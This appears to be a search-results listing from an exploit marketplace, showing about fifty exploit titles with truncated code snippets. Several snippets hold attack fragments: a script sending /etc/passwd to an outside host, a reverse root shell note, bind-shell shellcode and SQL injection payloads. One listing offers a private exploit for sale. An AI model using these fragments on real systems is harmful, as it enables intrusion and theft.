39001 matches found
Marked2 - Local File Disclosure Vulnerability
Exploit for multiple platform in category local exploits var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new...
HPE iLO4 < 2.53 - Add New Administrator User Exploit
Exploit for multiple platform in category remote exploits !/usr/bin/env python """ Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP:...
InfoZip UnZip 6.00 / 6.1c22 Buffer Overflow Vulnerability
InfoZip UnZip versions 6.00 and below and 6.1c22 and below suffer from multiple buffer overflow vulnerabilities. ======================================================================= title: Multiple buffer overflow vulnerabilities product: InfoZip UnZip vulnerable version: UnZip = 6.00 / UnZip ...
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution Exploit
Exploit for windows platform in category remote exploits Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE Date: February 6, 2018 Exploit Author: Faisal Tameesh @DreadSystems Company: Depth Security https://depthsecurity.com Version: Adobe Coldfusion 11.0.03.292866 Tested On...
Entrepreneur Dating Script 2.0.2 - Authentication Bypass Vulnerability
Exploit for php platform in category web applications Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass Dork: N/A Exploit Author: Borna nematzadeh L0RD or email protected Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/ Version: 2.0.2...
Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow /
Exploit for hardware platform in category remote exploits STX Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access Attack vector: Remote Authentication: Anonymous no credentials needed Researcher:...
HiSilicon DVR Devices - Remote Code Execution Exploit
Exploit for hardware platform in category remote exploits !/usr/bin/env python2 pwn hisilicon dvr web service from pwn import from time import sleep import re import argparse import os parser = argparse.ArgumentParserdescription='exploit HiSilicon DVR devices' parser.addargument'--rhost',...
Vivotek IP Cameras - Remote Stack Overflow (PoC) Vulnerability
Exploit for multiple platform in category remote exploits STX Subject: Vivotek IP Cameras - Remote Stack Overflow Researcher: bashis September-October 2017 PoC: https://github.com/mcw0/PoC Release date: November 13, 2017 Full Disclosure: 43 days Attack Vector: Remote Authentication: Anonymous no...
Vitek - Remote Command Execution / Information Disclosure (PoC) Vulnerability
Exploit for multiple platform in category remote exploits STX Subject: Vitek RCE and Information Disclosure and possible other OEM Attack vector: Remote Authentication: Anonymous no credentials needed Researcher: bashis December 2017 PoC: https://github.com/mcw0/PoC Release date: December 22, 201...
Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
Naukri Clone Script - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Naukri Clone Script - Stored XSS Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/naukri-clone-scrip...
Cisco ASA - Crash PoC Exploit
Exploit for hardware platform in category dos / poc Cisco ASA CVE-2018-0101 Crash PoC We basically just read: https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf @zerosum0x0, @jennamagius, @alephnaught import requests, sys headers =...
Asterisk 13.17.2 - chan_skinny Remote Memory Corruption Exploit
Exploit for multiple platform in category dos / poc Exploit Author: Juan Sacco Vulnerability found using Exploit Pack v10 - Fuzzer module CVE-2017-17090 - AST-2017-013 Tested on: Asterisk 13.17.2dfsg-2 Description: Asterisk is prone to a remote unauthenticated memory exhaustion The vulnerability ...
Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS. Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
Android - getpidcon Permission Bypass in KeyStore Service Vulnerability
Exploit for Android platform in category dos / poc The keystore binder service "android.security.IKeystoreService" allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux...
Axis SSI - Remote Command Execution / Read Files Vulnerabilities
Exploit for multiple platform in category remote exploits STX Subject: SSI Remote Execute and Read Files Researcher: bashis August 2016 Release date: October, 2017 Old stuff that I've forgotten, fixed Q3/2016 by Axis Attack Vector: Remote Authentication: Anonymous no credentials needed Conditions...
Herospeed - TelnetSwitch Remote Stack Overflow / Overwrite Password / Enable TelnetD Exploit
Exploit for hardware platform in category remote exploits !/usr/bin/env python2.7 Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd. Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd. Verified 1 Fullhan IPC...
Dahua Generation 2/3 - Backdoor Access Exploit
Exploit for hardware platform in category remote exploits !/usr/bin/python2.7 if False: ''' 2017-05-03 Public rerelease of Dahua Backdoor PoC https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py 2017-03-20 With my newfound knowledge of vulnerable devices out there with an unbelievable...
Multiple OEM - nsd Remote Stack Format String (PoC)
Exploit for multiple platform in category dos / poc STX Subject: Remote Stack Format String in 'nsd' binary from multiple OEM Attack vector: Remote Authentication: Anonymous no credentials needed Researcher: bashis December 2017 PoC: https://github.com/mcw0/PoC Release date: December 14, 2017 Ful...
Geovision Inc. IP Camera & Video - Remote Command Execution Exploit
Exploit for hardware platform in category remote exploits !/usr/bin/env python2.7 SOF Geovision Inc. IP Camera & Video Server Remote Command Execution PoC Researcher: bashis November 2017 1. Pop stunnel TLSv1 reverse root shell Local listener: 'ncat -vlp --ssl'; Verified w/ v7.60 2. Dump all...
Uniview - Remote Command Execution / Export Config (PoC) Vulnerability
Exploit for multiple platform in category remote exploits STX Subject: Uniview RCE and export config PoC Researcher: bashis October 2017 Attack Vector: Remote Authentication: Anonymous no credentials needed Export config...
CVS Suite 2009R2 / Insecure Library Loading Vulnerability
Exploit for windows platform in category local exploits + Credits: John Page aka hyp3rlinx Vendor: ============= march-hare.com Product: =========== WINCVS 2009R2 CVS Suite is a modern versioning system that combines the power and stability of CVS with modern easy to use client software and suppo...
Kaspersky Secure Mail Gateway 1.1.0.379 CSRF / Code Execution Vulnerabilities
Exploit for multiple platform in category remote exploits Kaspersky Secure Mail Gateway Multiple Vulnerabilities 1. Advisory Information Title: Kaspersky Secure Mail Gateway Multiple Vulnerabilities Advisory URL:...
Netis WF2419 Router - Cross-Site Scripting Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Netis-WF2419 HTML Injection Exploit Author: Sajibe Kanti Author Contact :https://twitter.com/@sajibekantibd Vendor Homepage: http://www.netis-systems.com/ Version: Netis-WF2419 , V3.2.41381 Tested on: Windows 10 CEV :...
Joomla jLike 1.0 Component - Information Leak Exploit
Exploit for php platform in category web applications "; foreach$l as $u echo "- ID\n\n\n\n:\n" .$u'id'.""; echo "- Name\n\n:\n" .$u'name'.""; echo "- Email\n:\n" .$u'email'.""; echo ""; echo "-----------------------------"; elseecho "- No user"; ? 0day.today 2018-04-04...
BOCHS 2.6-5 - Local Buffer Overflow Exploit
Exploit for linux platform in category local exploits Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts wi...
Joomla JSP Tickets 1.1 Component - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection Dork: N/A Date: 04.02.2018 Vendor Homepage: http://joomlaserviceprovider.com/ Software Link:...
Joomla Zh YandexMap 6.2.1.0 Component - id SQL Injection Vulnerability
Exploit for php platform in category web applications input name="id" value="-11 UNION ALL SELECT...
MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation Exploit
Exploit for windows platform in category local exploits / Title : MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date : 02/02/2018 Author : Souhail Hammou Vendor Homepage : https://www.malwarefox.com/ Version : 2.74.0.150 Tested on : Windows 7 32-bit / Windows 10 64-bit CVE :...
Online Voting System - Authentication Bypass Exploit
Exploit for php platform in category web applications Exploit Title: Online Voting System - Authentication Bypass Vendor Homepage: http://themashabrand.com Software Link: http://themashabrand.com/p/votin Demo: http://localhost/Onlinevoting Version: 1.0 Category: Webapps Exploit Author: Giulio Com...
Joomla Zh BaiduMap 3.0.0.1 Component - SQL Injection Vulnerability
Exploit for php platform in category web applications input name="id" value="-11 UNION ALL SELECT...
WordPress Core - load-scripts.php Denial of Service Exploit
Exploit for php platform in category dos / poc EDB Note: python doser.py -g...
Student Profile Management System Script 2.0.6 - Admin Panel Authentication Bypass Vulnerability
With this exploit,Attacker can bypass admin panel Authentication. Exploit title: Student Profile Management System Script 2.0.6 - Admin Panel Authentication Bypass Dork: "Powered by: i-Net Solution" Date: 2018-02-06 Exploit Author: Borna nematzadeh L0RD or email protected Vendor Homepage:...
NixCMS 1.0 - category_id SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: NixCMS 1.0 - 'categoryid' SQL Ýnjection Vendor: https://www.nixdesign.de Software Link: https://www.nixdesign.de/nix-cms/ Demo: http://www.jamaram.de/ Version: 1.0 Tested on: WiN10X64 Exploit Author: Bora Bozdogan Author WebSite...
Wonder CMS 2.3.1 - Unrestricted File Upload Vulnerability
Exploit for php platform in category web applications Affected Code: public static function uploadFile + - if ! wCMS::$loggedIn && ! isset$FILES'uploadFile' && ! isset$REQUEST'token' return; + private static function uploadFileAction - if isset$REQUEST'token' && $REQUEST'token' ==...
Joomla Zh GoogleMap 8.4.0.0 Component - SQL Injection Vulnerability
Exploit for php platform in category web applications input name="id" value="-11 UNION ALL SELECT...
Matrimonial Website Script 2.1.6 - uid SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Matrimonial Website Script 2.1.6 - 'uid' SQL Injection Exploit Author: Borna nematzadeh L0RD or email protected Vendor Homepage: https://www.phpscriptsmall.com/product/matrimonial-website-script/ Version: 2.1.6 Category: Webapps...
Wonder CMS 2.3.1 - Host Header Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Wonder CMS 2.3.1 Host Header Injection Exploit Author: Samrat Das Contact: http://twitter.com/SamratDas93 Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.wondercms.com/ Version: 2.3.1 CVE :...
Coinhive – Monero JavaScript Mining Information Disclosure (SecretKey) Vulnerability
This Exploits allows the attacker to gain the secret key of either several targets by using dork provided, or specific target by following description. NOTICE: secretkey != privatekey of any wallet. This is private exploit. You can buy it at https://0day.today...
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)
global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; copy socket descriptor to rdi for future use xchg rdi,rax ; server.sinfamily = AFINET ; server.sinport = htonsPORT ;...
Claymore Dual GPU Miner 10.5 Format String Vulnerability
Exploit for multiple platform in category remote exploits Claymore Dual Gpu Miner = 10.5 Format Strings Vulnerability ======================================================================= product: Claymore's Dual Miner vulnerable version: = 10.5 fixed version: 10.6 CVE number: - CVE-2018a6317...
Microsoft Windows Subsystem for Linux - execve() Local Privilege Escalation Exploit
Exploit for windows platform in category local exploits define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x18 define LEAKOFFS...
Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode
/----- Crypter.c ----- / / Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip Partially re-written by Andre Lima https://andrelima.info to encrypt/decrypt variable length Linux x8664 shellcode. compiler is gccegcs-2.91.66 flags are -O3...
Apport / ABRT chroot Privilege Escalation Exploit
This Metasploit module attempts to gain root privileges on Linux systems by invoking the default coredump handler inside a namespace "container". Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by...
Microsoft Windows SMB MS17-010 EternalRomance / EternalSynergy / EternalChampion Remote Code Executi
This Metasploit module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type...
Advance Loan Management System - id SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Advance Loan Management System - 'id' SQL Injection Exploit Author: 8bitsec Vendor Homepage: https://codecanyon.net/ Software Link:...
Joomla JMS Music 1.1.1 Component - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Joomla! Component JMS Music 1.1.1 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: https://www.joommasters.com/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jms-music...
FiberHome AN5506 - Unauthenticated Remote DNS Change Vulnerability
Exploit for hardware platform in category web applications FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability Software Version RP2617 Device Model AN5506-04-F Vendor Homepage: www.fiberhome.com/ Date: 01/02/2018 Exploit Author: r0ots3c http://wandoelmo.com.br...
Joomla JE PayperVideo 3.0.0 Component - usr_plan SQL Injection Exploit
Exploit for php platform in category web applications 0day.today 2018-04-12...
Joomla JEXTN Classified 1.0.0 Component - sid SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Joomla! Component JEXTN Classified 1.0.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://jextn.com/ Software Link:...